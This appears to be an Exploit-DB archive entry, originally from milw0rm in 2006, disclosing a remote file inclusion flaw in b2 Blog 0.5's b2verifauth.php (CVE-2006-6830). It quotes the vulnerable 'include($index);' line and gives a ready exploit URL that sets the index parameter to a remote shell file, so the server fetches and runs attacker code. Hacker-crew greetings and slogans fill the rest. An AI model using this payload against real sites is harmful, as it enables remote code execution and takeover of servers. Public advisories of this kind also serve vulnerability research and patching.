Exploit b2 Blog 0.5 - 'b2verifauth.php' Remote File Inclusion

[Exploiter]

EDB-ID

2983

Проверка EDB

1. Пройдено

Автор

MDX

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-6830

Дата публикации

2006-12-23

******************************************************************************************************
*b2 - 0.5 * [index] ******************* Remote File Ýnclude*******************************************
******************************************************************************************************
******************************************* +class : Remote File Include Vulnerability*
+******************************************************************************************************************
+Author : mdx                                                               
*
*****************************************************************************
+Files :                                                                    *
+b2verifauth.php? 							    *
*                                                                           *
**********************************************************************************
+code  :								         *
+									         *
+         include($index);							 *
+									         *
*********************************************************************************************
+ Exploit  :										    *
+********************************************************************************************+
+ http://www.site.***/[path]/b2verifauth.php?index=http://mdxshell.txt?  		     +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
=================================================================================================================
?		   Hi , The_bat_hacker , How are you ? ;=) 				     			*
?											     			*
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , Ozii ,padisah, sakkure ,zip,y.$il abbad, dreamlord  *
?											     			*
?////////////////////////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************									     *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..  		     *
*******************									     *
*******************                        Turkish Hacker by mdx  			     *
******************* 		   							     *
*******************                        Korkmak Kurtulmak Degildir.			     *
*******************              							     *
**********************************************************************************************

# milw0rm.com [2006-12-23]